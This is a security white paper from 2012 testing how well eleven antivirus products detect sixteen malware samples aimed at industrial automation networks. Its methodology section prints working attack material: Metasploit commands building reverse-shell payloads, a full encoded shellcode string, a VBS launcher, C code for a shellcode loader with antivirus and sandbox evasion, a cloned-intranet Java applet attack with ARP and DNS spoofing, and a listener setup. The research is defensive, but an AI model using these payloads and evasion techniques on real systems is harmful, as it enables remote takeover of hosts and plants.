White Paper - Are antivirus solutions enough to protect industrial plants?
ANTIVIRUS SOLUTIONS ARE ENOUGH TO PROTECT INDUSTRIAL PLANTS? Jan Seidl 1 Marcelo Ayres Branquinho 2SummaryMalware infections are becoming increasingly common in industries, leading in some cases toloss of control and compromising key servers on the automation network. On the majority ofthe contaminations investigated by us on our Brazilian clients there was in fact an anti-virussolution installed on the hosts of the infected network and they weren’t able of detecting nordeterring the threat infection and replication.Anti-virus solutions analysis found on the internet and at specialized magazines evaluate theinfection prevention’s effectiveness of the solutions on personal computers or corporatenetworks but aren’t an adequate base of comparison when choosing a prevention solution forSCADA networks.In order to better orient our clients about the anti-virus solution that would fit best on anautomation network, we decided to run an independent test, totally unbiased, without anyvendor connection, in order to determine the surface of threat protection given by each one ofthe top market solutions.This paper presents a series of tests realized at our laboratories aiming the measurement ofeach antivirus solution’s efficacy against low and medium complexity attacks using opensource attack tools easily downloaded from the internetKeywords: Antivirus, SCADA, Security, Malware, Attacks.1 CTO at TI Safe Segurança da Informação Ltda, Brasil (http://br.linkedin.com/in/janseidl)2 CEO at TI Safe Segurança da Informação Ltda, Brasil (http://br.linkedin.com/in/marcelobranquinho)
1 INTRODUCTIONAn increasing amount of Brazilian industries are facing serious trouble related to malwareinfections on their automation plants, in some cases leading to loss of control, HMI freezingand compromising key servers on the automation network.In all cases in which we operated, automation networks had, at least on some servers,antivirus solutions installed and updated, and they were not able to prevent them frombecoming infected and the infection from spreading throughout company’s automationnetwork, causing serious problems.Looking at these cases in plants of Brazilian customers, our SCADA Security Divisiondecided to investigate independently and without any influence from any manufacturer, theextent to which anti-virus solutions were being effective in detecting and combating threats inautomation networksThe topics that follow in this paper details the tests that were performed in the laboratory ofTI Safe in the city of Rio de Janeiro from 25 to 27 January 2012 and contains the resultsobtained and the conclusions reached about, trying to answer a simple question: how anantivirus solution is effective in protecting industrial networks?
2 METHODOLOGY APPLIED2.1 THE TESTING VIRTUAL NETWORKPrior to performing the tests we configured a small test virtual network of whose architectureis shown in the figure below:Machine (a) – VictimVirtual machine with Microsoft Windows 7 Enterprise 32bits operating system within OracleVirtual Box 3.2.8_OSE virtualization platform. After installing the operating system, themachine received all security updates and patches through Windows Update. Were installedAdobe Reader version 8.1.2 and Java Runtime Environment version 6 update 30 to serve asvectors of infection to be explored in our tests. After completion of the virtual machineconfiguration with the components listed above, we took a snapshot of the machine calledInitial State that will be used as a starting point for all tests.Machine (b) – Apache Web Server (Fake intranet)To simulate a virtual network with a corporate intranet, we set up an Apache web server onanother machine within Oracle Virtual Box 3.2.8_OSE. In the victim machine, there is anInternet Explorer 9 browser with the home page configured to the URL of the Apache webserver (supposedly, the corporate intranet). This is a common configuration in enterpriseenvironments and during testing we cloned and injected malware to this site’s original html toserve as an attack vector for social engineering.Machine (c) – AttackerThe machine is an HP Pavilion DV6780se laptop with Backtrack Linux Version 4 with theMetasploit Framework version 3 Community fully updated. The Metasploit Framework is aframework for development and launch of exploits frequently used in penetration testing. Theframework consists of a series of tools, exploits and code snippets that can be used throughdifferent interfaces.
2.2 DESCRIPTION OF THE ATTACKS MADESamples used in the tests were in part generated by the Metasploit Framework, part injectedby web vectors, part reused from open source code injectors and part coded internally by TISafe’s SCADA security team in the lab.The 16 malware samples used in the tests were the following: 1. “EICAR”: EICAR4 anti-virus test file 2. “Metasploit EXE Default Template (no encryption)”: Binary file generated by Metasploit Framework with Meterpreter (MSF native interpreter) payload within default binary template, without payload encryption. # msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106 LPORT=31337 R | msfencode -t exe -o sample2.exe -e generic/none 3. “Metasploit EXE Default Template (shikata_ga_nai)”: Binary file generated by Metasploit Framework with Meterpreter (MSF native interpreter) payload within default binary template with shikata_ga_nai payload encryption. # msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106 LPORT=31337 R | msfencode -t exe -o sample3.exe -e x86/shikata_ga_nai 4. “Metasploit EXE Notepad Template (no encryption)”: Binary file generated by Metasploit Framework with Meterpreter (MSF native interpreter) payload within Turkish Windows 7’s original Notepad (notepad.exe) as template, without payload encryption. # msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106 LPORT=31337 R | msfencode -t exe -o sample4.exe -e generic/none -k -x notepad_win7_turkish.exe 5. “Metasploit EXE Notepad Template (shikata_ga_nai)”: Binary file generated by Metasploit Framework with Meterpreter (MSF native interpreter) payload within Turkish Windows 7’s original Notepad (notepad.exe) as template, with shikata_ga_nai payload encryption. # msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106 LPORT=31337 R | msfencode -t exe -o sample5.exe -e x86/shikata_ga_nai -k -x notepad_win7_turkish.exe 6. “Metasploit EXE SkypePortable Template (shikata_ga_nai)”: Binary file generated by Metasploit Framework with Meterpreter (MSF native interpreter) payload within Skype Portable (SkypePortable_online.paf.exe) as template, with shikata_ga_nai payload encryption. # msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106 LPORT=31337 R | msfencode -t exe -o sample6.exe -e x86/shikata_ga_nai -k -x SkypePortable_online.paf.exe
7. “Metasploit LOOP-VBS Default Template (no encryption)”: VBS script generated by Metasploit Framework with Meterpreter (MSF native interpreter), without payload encryption. # msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106 LPORT=31337 R | msfencode -t loop-vbs -o sample7.exe -e generic/none8. “Metasploit LOOP-VBS Default Template (shikata_ga_nai)”: VBS script generated by Metasploit Framework with Meterpreter (MSF native interpreter), with shikata_ga_nai encryption. # msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106 LPORT=31337 R | msfencode -t loop-vbs -o sample8.exe -e x86/shikata_ga_nai9. “Shellcodexec Default w/ VBS launcher”: ShellcodeExec5 code injector with VBS launcher and alphanumeric payload generated by MSF. The ShellCodeExec code injector has no embedded payload and receives it as command-line argument. The payload is generated though MSF: # msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LHOST=10.1.1.106 LPORT=31337 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX Output: PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylxhniC0Wp30U0k9m 5EaJrRDnkRrFPlKrrFlLK3bdTLKcBWXDOLwCzWVP19ouaO0LlUlPaql6b6LQ0ja8OtM5Q Jg8bxpqBSglKpRb0lKG2elFa8PnkqPt8K5IPD42jeQZpf0nkRhUHLK0XEpgqKckSWLcyL KgDnkfaZvp1Yo6QkpLliQjoTMGqZg5hIp45KDGsqmXxwKsMtdBUJBPXLK1HetFaZsQvNk TLBklKpXwlfaZsLKDDlKWqZpmYQTQ4vDCksk0aSicjPQkOM0BxSoSjNkUB8kk6cmrHecd rwpS01xD7SC7BsoRt3XrlrWGVWwion5H8lPwq7puPfIo4V4bp3XTiopRKs0ioIE602p60 60spF0QPV0cX8jvoiOKPkOkeMGCZ6eu86jC1uQ1z58ERgpCJSYmY8fazR02vcgCXlYMut 4qq9ohUk5O0rT4LioPNgxBUXlBHXpoEmrsf9on5Qz5PRJfdCfCgSXfbXYKx3oYojuNkdv 2Jw0BHuP20S0c0cfrJ7p58bxNDccm5KOXUnsf3qzWpV63crwE8vbHYIX3o9oKeuQXCtiy VNeL6SEzLxCAA We create a VBS script to run the binary passing the payload as argument: Set oShell = CreateObject("Wscript.shell") sPath=Wscript.ScriptFullName x=InstrRev(sPath, "") sPath=Left(sPath,x) sCmd = sPath+"scex32.exe PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylxhniC0Wp30U0k9m 5EaJrRDnkRrFPlKrrFlLK3bdTLKcBWXDOLwCzWVP19ouaO0LlUlPaql6b6LQ0ja8OtM5Q Jg8bxpqBSglKpRb0lKG2elFa8PnkqPt8K5IPD42jeQZpf0nkRhUHLK0XEpgqKckSWLcyL KgDnkfaZvp1Yo6QkpLliQjoTMGqZg5hIp45KDGsqmXxwKsMtdBUJBPXLK1HetFaZsQvNk TLBklKpXwlfaZsLKDDlKWqZpmYQTQ4vDCksk0aSicjPQkOM0BxSoSjNkUB8kk6cmrHecd rwpS01xD7SC7BsoRt3XrlrWGVWwion5H8lPwq7puPfIo4V4bp3XTiopRKs0ioIE602p60 60spF0QPV0cX8jvoiOKPkOkeMGCZ6eu86jC1uQ1z58ERgpCJSYmY8fazR02vcgCXlYMut 4qq9ohUk5O0rT4LioPNgxBUXlBHXpoEmrsf9on5Qz5PRJfdCfCgSXfbXYKx3oYojuNkdv
2Jw0BHuP20S0c0cfrJ7p58bxNDccm5KOXUnsf3qzWpV63crwE8vbHYIX3o9oKeuQXCtiy VNeL6SEzLxCAA" oShell.Run sCmd,0,False10. “TI Safe Modded Shellcodeexec (w/ VBS launcher)”: ShellcodeExec code injector modified by TI Safe with VBS launcher and alphanumeric payload generated by MSF. We took ShellCodeExec’s source-code, changed all the function and variable names at random (obfuscation) e and changed the execution flow path in order to avoid the anti- virus software heuristics signature.11. “TI Safe Modded Shellcodeexec (Custom EXE w/ embedded payload)”: ShellcodeExec code injector modified by TI Safe with embedded alphanumeric payload generated by MSF. We removed the program’s argument passing (argv) to the injector function and put the payload from a char variable in place so get all the malware into a single file.12. “TI Safe Custom Payload Launcher”: Code injector created at TI Safe laboratory with embedded alphanumeric payload generated by MSF and rudimentary anti-virus sandbox evasion system. We built a small C program with a call to VirtualAlloc() with the flags: PAGE_EXECUTE_READWRITE. void* p = VirtualAlloc(NULL, PAYLOAD_SIZE, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); Copy the payload to the newly reserved memory area: char payload[PAYLOAD_SIZE] = “PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylxhniC0Wp30U0k9 m5EaJrRDnkRrFPlKrrFlLK3bdTLKcBWXDOLwCzWVP19ouaO0LlUlPaql6b6LQ0ja8OtM5 QJg8bxpqBSglKpRb0lKG2elFa8PnkqPt8K5IPD42jeQZpf0nkRhUHLK0XEpgqKckSWLcy LKgDnkfaZvp1Yo6QkpLliQjoTMGqZg5hIp45KDGsqmXxwKsMtdBUJBPXLK1HetFaZsQvN kTLBklKpXwlfaZsLKDDlKWqZpmYQTQ4vDCksk0aSicjPQkOM0BxSoSjNkUB8kk6cmrHec drwpS01xD7SC7BsoRt3XrlrWGVWwion5H8lPwq7puPfIo4V4bp3XTiopRKs0ioIE602p6 060spF0QPV0cX8jvoiOKPkOkeMGCZ6eu86jC1uQ1z58ERgpCJSYmY8fazR02vcgCXlYMu t4qq9ohUk5O0rT4LioPNgxBUXlBHXpoEmrsf9on5Qz5PRJfdCfCgSXfbXYKx3oYojuNkd v2Jw0BHuP20S0c0cfrJ7p58bxNDccm5KOXUnsf3qzWpV63crwE8vbHYIX3o9oKeuQXCti yVNeL6SEzLxCAA”; char* pload_pointer = (char*) p; char* x = payload; int i; for(i = 0; i < PAYLOAD_SIZE; i++) *pload_pointer++ = *x++; And run it: (*(void (*)()) p)(); Finally, we added some functions to detect the behavior of some sandboxes and abort
the program with a clean exit (return 0) through timing analisis and function bypass verification to reduce the number of solutions that could catch our virus by execution tracing.13. “Metasploit PDF (adobe_utilprintf)”: Meterpreter embedded into a PDF exploit adobe_util.printf14. “Metasploit PDF (adobe_pdf_embedded_exe)”: Meterpreter embedded into a PDF exploit adobe_pdf_embedded_exe15. “Metasploit PDF (adobe_pdf_embedded_exe_nojs)”: Meterpreter embedded into a PDF exploit adobe_pdf_embedded_exe_nojs16. “Metasploit Java Applet”: Meterpreter embedded into Java Applet through Web based attack. We used SET9 (Social Engineering Toolkit) clone the intranet and inject the java applet into its source-code. From the main menu we choose: 1 (Social Engineering Attacks) → 2 (Website Attack Vectors) → 1 (Java Applet Attack Method) → 2 (Website Cloner) → 13 (ShellCodeExec Alphanum Shellcode) → Windows Meterpreter Reverse Tcp arpspoof10 was used to do a MITM (Man-in-the-middle) attack through com “Arp Poisoning”. dnsspoof10 was also used to spoof the victim’s DNS requests redirecting the traffic to the intranet to the attacker’s machine where the malicious website copy is running from a lightweight python webserver.. Following, we open Internet Explorer 9 on the victim machine and wait for the intranet site be automatically loaded as it is the configured start page. The browser then requests the name resolution for the intranet URL and receives the spoofed IP since the connection is poisoned and the requests are spoofed. The fake webpage is loaded and a Java prompt presented asking if the user wants to run the component that is indicated that was issued by the company. By clicking in “Run”, the malware is executed. In the attacking machine (Machine C), we load up Metasploit Framework Console (msfconsole) and spawn meterpreter’s handler configured to persists multiple sessions and automatically run our script to migrate to explorer.exe process and not end if the user closes his browser. The browser on the victim machines hangs a bit then is automatically redirected to the real website. # msfconsole msf > use multi/handler msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set LHOST 10.1.1.106 msf exploit(multi/handler) > set LPORT 31337 msf exploit(multi/handler) > set ExitOnSession false msf exploit(multi/handler) > set AutoRunScript /root/msf_scripts/migrate_to_explorer.rb
2.3 TEST METHODSThe methodology used for the tests follows the sequence of steps detailed below:a) Setting the victim machine with the antivirus solution to be tested: From the virtualmachine on your Initial State, install and configure the antivirus solution to be tested. Afterinstallation, proceed with license registration (when available) and perform complete updateof the subscription base of antivirus solution. After this we obtained a new snapshot of themachine called Protected State.All antivirus software tested (except the free ones) were obtained from the websites of theirmanufacturers in their evaluation versions (32-bit) in English. All were installed on theRecommended option.Antivirus solutions tested were the following: • McAfee Antivirus Plus 2012 • Kaspersky Antivirus 2012 • Panda Antivirus Pro 2012 • Trend Titanium Maximum Security 2012 • Norton Antivirus 2012 • F-Secure Antivirus 2012 • avast! Pro Antivirus 6 • AVG Anti-Virus FREE 2012 • Sophos Anti-Virus 7 • Microsoft Security Essentials • E-SET NOD32 Antivirus 5 b) Execution of attack: the victim machine in Protected State is submitted to the first attack of the list and the results are noted. c) Restoration of the victim machine: after the attack has been tested, the snapshot is restored from the victim machine in Protected State and the next attack is performed. This sequence is repeated until all the attacks have been done with anti-virus testing. Finished the tests for one antivirus, the same sequence will be repeated for the next antivirus.
3 RESULTSThe results were compiled into a matrix (Appendix A). From the analysis of this matrix wasobserved that:• The vast majority of detections were based on heuristics.• The vast majority of antivirus solutions were not able to detect the threat in memory.• Only two solutions reacted based on behavior: Sophos Antivirus 7 and Panda Antivirus2012.• None of the solutions that detected an attack was able to stop it.• None of the solutions achieved the highest score.• None of the solutions could detect more than one malware sample created into TI Safe´slaboratory (attacks 10, 11 and 12).• Some commercial products have not been able to detect any malware sample created into TISafe´s laboratory (fits 10, 11 and 12).• In terms of heuristics, there are commercial solutions that underperformed the free solutionsand others that have equivalent performance.• All candidates failed to prevent the attack by the Java applet (attack 16).The detection rate by type of malware obtained in our tests was as follows: Infections by malware type Metasploit- generated binaries Java Applet Custom Detections by malware type malware PDF Metasploit- generated binaries Java Applet Custom malware PDF
Malware detection ratio 100,00 90,00 80,00 70,00 60,00 50,00 40,00 30,00 20,00 10,00 0,00 Java Applet PDF Metasploit-generated binaries Custom malware Malware infection ratio 30 25 20 15 10 5 0 Java Applet PDF Metasploit-generated binaries Custom malwareIn a ranking from 0 (minimum) to 16 (maximum) possible points, the final ranking ofantivirus products tested were as follows: # Product Score F-Secure Antivirus 2012 1 13 Sophos Anti-Virus 7 McAfee Antivirus Plus 2012 Kaspersky Antivirus 2012 2 avast! Pro Antivirus 6 12 Microsoft Security Essentials E-SET NOD32 Antivirus 5 3 Panda Antivirus Pro 2012 11 Norton Antivirus 2012 4 9 AVG Anti-Virus FREE 2012 5 Trend Titanium Maximum Security 8
4 DISCUSSIONCan we trust on antivirus testing we read in magazines or found on the Internet?A quick Internet search can find hundreds of journal articles with the analysis of antivirusproducts, many containing detailed recommendations and opinions of experts based onexperience and most of use on home computers.Due to this, it is difficult to rely on these tests when we need to protect a critical asset such asan automation network. Moreover, much of the analysis is biased and seeks to encourageantivirus vendors that sponsored.A serious research should be based on a reliable methodology and have no commercialinterests involved. Some international organizations such as nonprofit AMTSO11 (Anti-Malware Testing Standards Organization) provide test methods and extensive documentationto improve the quality, objectivity and relevance in analyzes of antivirus solutions.5 CONCLUSIONSHow effective is an antivirus solution to protect automation networks?Most anti-virus technologies are based on the knowledge of the signatures of attacks, which isgreat if you are fighting common threats like Confiker or Slammer, for example. Our testsshowed that when the malware is a little more sophisticated or exploits unknown Windowsvulnerabilities (zero-day), the antivirus solutions do little to defend the system.Were not just talking about sophisticated cyber weapons such as Stuxnet and DuQu, but lesssophisticated attacks that script-kiddies can perform with the aid of attack tools downloadedfrom the Internet.Our study showed that no antivirus solution is able to provide full protection for automationnetworks and lead companies to have a "false sense of security", believing they are safe whilethe network may be infested with malware, suffering attacks ranging from industrialespionage until the control of their systems by external attackers.If a security expert says that SCADA systems can be protected using only antivirus solutions,he may be committing a grave error and undermining the productivity of your company.Antivirus products are recommended, but do not provide all necessary security in controlsystems networks.Our recommendation for a more secure automation network is the use of compensatingcontrols beyond antivirus solution. These controls will protect the network against attacksbefore they even infect the control network.The segmentation of the automation network according to the ANSI/ISA-99 standard (thezones and conduits12 model) is very important and should be done. At the entrance to eachsecurity zone there should be safety equipment such as edge firewalls and intrusion detectionand prevention systems (IDPSs) configured with SCADA signatures.
A good review of the existing firewall rules that protect the automation network (driven byindustry best practices), tight control over any device that is connected to the SCADAnetwork (third party laptops, removable media, modems, etc.) and deep inspection of newprograms before they are installed can dramatically increase the level of safety and preventinfections.Some practices should be the rule in automation networks. Do not allow the use of email andweb access within the automation network and, as far as possible, update the security patchesof the most critical computers, are extremely desirable. All security solutions installed andconfigured on the automation network should unite their logs into a single database managedby a good SIEM (Security Information and Event Management) solution, which will alert thesecurity team at the slightest sign of a security incident.In addition to preventing, companies should be prepared for the worst case and have acontingency plan in case anything goes wrong and the plant automation gets infected. It isessential to have automated backup tools installed as well as redundancy in critical servers ofthe automation network. Our experience shows that the process of disinfecting a contaminatedautomation network is quite costly, complex and depends on the cooperation of manufacturersfor success, which makes the process slow. We encourage the international community tocreate a guide of good practices for the disinfection of an automation plan. This guide willserve as a baseline to be followed by companies that are experiencing this problem to regaincontrol over their SCADA systems in a planned and preferably rapid manner.
REFERENCES ON THE INTERNET1 http://www.tisafe.com/solucoes/seguranca-scada/2 http://www.backtrack-linux.org/3 http://www.metasploit.com/4 http://www.eicar.org/86-0-Intended-use.html5 https://github.com/inquisb/shellcodeexec6 http://www.metasploit.com/modules/exploit/windows/browser/adobe_utilprintf7 http://www.metasploit.com/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe8 http://www.metasploit.com/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs9 http://www.social- engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_(SET)10 http://monkey.org/~dugsong/dsniff/11 http://www.amtso.org12 http://www.slideshare.net/tisafe/apresentao-tcnica-segurana-scada-realizada-no-isa-show-2011
APPENDIX A – MATRIX OF TEST RESULTS McAfee Antivirus Plus Kaspersky Antivirus Panda Antivirus Pro Trend Titanium AVG Anti-Virus FREE Microsoft Security Norton Antivirus 2012 F-Secure Antivirus 2012 avast! Pro Antivirus 6 Sophos Anti-Virus 7 E-SET NOD32 Antivirus 5 2012 2012 2012 Maximum Security 2012 Essentials EICAR EICAR test file EICAR-Test-File EICAR-AV-TEST-FILE Eicar_test_file EICAR Test String Trojan.Generic.6567028 EICAR Test-NOT virus!!! EICAR_Test EICAR-AV-Test DOS/EICAR_Test_File Eicar test file Metasploit EXE Default Template (no a variant of Win32/Rozena.AA Swrort.f Trojan.Win32.Generic Suspicious File TROJ_SWRORT.SME Packed.Generic.347 Backdoor.Shell.AC Win32:SwPatch Win32/Heur Mal/EncPk-ACE Trojan.Win32/Swrort.A encryption) trojan Metasploit EXE Default Template a variant of Win32/Rozena.AH Swrort.d Trojan.Win32.Generic Suspicious File TROJ_SWRORT.SME Packed.Generic.347 Backdoor.Shell.AC Win32:SwPatch Win32/Heur Mal/Swrort-C Trojan.Win32/Swrort.A (shikata_ga_nai) trojan Metasploit EXE Notepad Template (no a variant of Win32/Rozena.AA Swrort.f Trojan.Win32.Generic Trj/Genetic.gen - - Backdoor.Shell.AC Win32:SwPatch - Mal/Swrort-C Trojan.Win32/Swrort.A encryption) trojan Metasploit EXE Notepad Template a variant of Win32/Rozena.AH Swrort.d Trojan.Win32.Generic Trj/Genetic.gen - - Backdoor.Shell.AC Win32:SwPatch Win32/Heur Mal/Swrort-C Trojan.Win32/Swrort.A (shikata_ga_nai) trojanMetasploit EXE SkypePortable Template a variant of Win32/Rozena.AH Swrort.d Trojan.Win32.Generic - - - Backdoor.Shell.AC Win32:SwPatch - Mal/Swrort-C Trojan.Win32/Swrort.A (shikata_ga_nai) trojan Metasploit LOOP-VBS Default Template a variant of Win32/Rozena.AA Swrort.f Trojan.Win32.Generic Script Blocked TROJ_SWRORT.SME Packed.Generic.347 Backdoor.Shell.AC Win32:SwPatch - Mal/Swrort-C Trojan.Win32/Swrort.A (no encryption) trojan Metasploit LOOP-VBS Default Template a variant of Win32/Rozena.AH Swrort.f Trojan.Win32.Generic Script Blocked TROJ_SWRORT.SME Packed.Generic.347 Backdoor.Shell.AC Win32:SwPatch - Mal/Swrort-C Trojan.Win32/Swrort.A (shikata_ga_nai) trojan Trojan.Win32.Genome Win32/ShellcodeRunner.A Shellcodexec Default w/ VBS launcher Generic.tfr!i Trj/CI.A - Trojan.Gen Trojan.Generic.6567028 Win32:Malware-gen Trojan Generic22.KPM Mal/Generic.L - .vrrg trojan TI Safe Modded Shellcodeexec (w/ VBS - - Script Blocked - - - - - - - - launcher)TI Safe Modded Shellcodeexec (Custom - - - - - Backdoor.Shell.AC - Trojan Generic22.SND - Trojan.Win32/Swrort.A - EXE w/ embedded payload) TI Safe Custom Payload Launcher - - - - - - - - Mal/FakeAV-FS - - Bloodhound.Exploit.21 Metasploit PDF (adobe_utilprintf) Exploit.PDF.bk.gen Exploit.JS.Pdfka.cil - HEUR_PDFEXP.B Exploit.PDF-JS.Gen JS:Pdfka-gen Script/Exploit Troj/PDFJs-B Trojan.Win32/Swrort.A JS/Exploit.Pdfka.NOO trojan 3 Metasploit PDF Swrort.f Trojan.Win32.Generic Suspicious File TROJ_SWRORT.SME Bloodhound.PDF.24 Exploit.PDF-Dropper.Gen Win32:SwPatch Exploit.PDF Mal/Swrort-C Trojan.Win32/Swrort.A PDF/Exploit.Pidief.PFW trojan (adobe_pdf_embedded_exe) Metasploit PDF Swrort.f Trojan.Win32.Generic Suspicious File TROJ_PIDIEF.SMEO Bloodhound.PDF.24 Exploit.PDF-Dropper.Gen PDF:Launchr-C Exploit Mal/Swrort-C Trojan.Win32/Swrort.A PDF/Exploit.Pidief.PFT trojan (adobe_pdf_embedded_exe_nojs) Metasploit Java Applet - - - - - - - - - - -Note: the cells of the matrix with content in red indicate the signatures of attacks that were detected by antivirus solution tested. Empty cells indicate that theantivirus solution was not able to detect the attack and consequently that it succeeded.